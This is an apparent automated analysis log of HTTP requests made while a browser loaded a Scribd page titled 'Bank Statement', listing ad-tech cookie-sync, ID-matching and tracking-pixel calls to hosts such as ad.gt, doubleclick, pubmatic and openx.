Source: global trafficHTTP traffic detected: GET /pv?tid=HJzsxlu9-oWwMemKzV-9517ead42a&w=6212136826568704&o=5714937848528896&cv=2.1.75-1-gb0a1279&widget=false&checksum=1639592c&r=false&vr=1232x910&pageURL=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&sid=mZzGHyqA-W1pQwweWv-9517ead42a&pm=false&upapi=true HTTP/1.1Host: api.btloader.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /script/rlink.js?o=5714937848528896&bt_env=prod HTTP/1.1Host: cdn.btmessage.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?https://ids.ad.gt/api/v1/match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&adnxs_id=$UID&gdpr=0 HTTP/1.1Host: secure.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?id=998eaf06-9905-4eae-9e26-9fac75960c53&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fopenx%3Fopenx_id%3D%7BOPENX_ID%7D%26id%3DAU1D-0100-001739863021-EHT1L4CA-5M76%26auid%3DAU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: u.openx.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /supply/v5?sk=d_mapping&pk=scribd&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&bid=kHJlRroopxDWeXouLBrW&at=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&sw=1280&sh=1024&pvid=7ff1df5d-066c-41b7-b458-a21dec070290&l=en HTTP/1.1Host: yield-manager.browsiprod.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/ip_match?id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: ids4.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/UCookieSetPug?rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=audigent_w_appnexus_3985&google_cm&google_sc&google_ula=450542624&id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=3185&partner_device_id=AU1D-0100-001739863021-EHT1L4CA-5M76&partner_url=https://ids.ad.gt%2Fapi%2Fv1%2Ftapad_match%3Fid%3DAU1D-0100-001739863021-EHT1L4CA-5M76%26tapad_id%3D%24%7BTA_DEVICE_ID%7D HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /token?pid=50242&puid=AU1D-0100-001739863021-EHT1L4CA-5M76&gdpr=0 HTTP/1.1Host: token.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /6/map HTTP/1.1Host: bcp.crwdcntrl.netConnection: keep-aliveContent-Length: 440sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /events/v2/supply?p=kHJlRroopxDWeXouLBrW HTTP/1.1Host: events.browsiprod.comConnection: keep-aliveContent-Length: 474sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /r/dd/id/L2NzaWQvMS9jaWQvMTc0ODI0MTY1OC90LzA/url/https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Famo_match%3Fturn_id%3D%24!%7BTURN_UUID%7D%26id%3DAU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: d.turn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/UCookieSetPug?ird=1&rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bounce HTTP/1.1Host: id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /lb/v1 HTTP/1.1Host: lb.eu-1-id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /g/v2/882.json HTTP/1.1Host: id5-sync.comConnection: keep-aliveContent-Length: 500sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=8gkxb6n&ttd_tpi=1&ttd_puid=AU1D-0100-001739863021-EHT1L4CA-5M76&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&adnxs_id=8561637051911725247&gdpr=0 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/g_hosted?id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /us?https://ids.ad.gt/api/v1/son_match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&uid=[UID]&gdpr=0 HTTP/1.1Host: sync.go.sonobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?gdpr=0&gdpr_consent=&id=476b50d3-5ccf-49a1-89b8-1ddf8ea18042&r=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26gdpr%3D0%26gdpr_consent%3D%26advId%3D98%26advUuid%3D HTTP/1.1Host: u.openx.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /api/v1/event HTTP/1.1Host: p.ad.gtConnection: keep-aliveAccept: */*Access-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/v1/collect HTTP/1.1Host: a.ad.gtConnection: keep-aliveContent-Length: 604sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /pixel/p-1ZHFxK2kGG5Cz.gif?labels=publisher.27975.space.115858,adsize.400x272 HTTP/1.1Host: pixel.quantserve.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/js/user_sync.html?p=159196&userIdMacro=PM_UID&gdpr=0&gdpr_consent=&predirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D91%26advUuid%3DPM_UID%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ads.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync-iframe?gdpr=0&gdpr_consent=&redirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D150%26advUuid%3D%7BpartnerId%7D%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /adsid/integrator.json?aos=https%3A%2F%2Fwww.scribd.com HTTP/1.1Host: pubads.g.doubleclick.netConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-afma-token-requester-typeOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/segments?url=https%253A%252F%252Fwww.scribd.com%252Fdocument%252F806838445%252FBank-Statement&partner_id=474&tagger_id=b9be9e1d9d5a9785a6417a9309e00232&au_id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: seg.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /websiteconfig?bt_env=prod&o=5714937848528896&w=scribd.com&l=EN HTTP/1.1Host: api.btmessage.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?ssp=sekindo&gdpr=0&gdpr_consent= HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/amo_match?turn_id=2883371875300828767&id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=6gvshk1&ttd_tpi=1&ttd_puid=67b433ed2421e&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
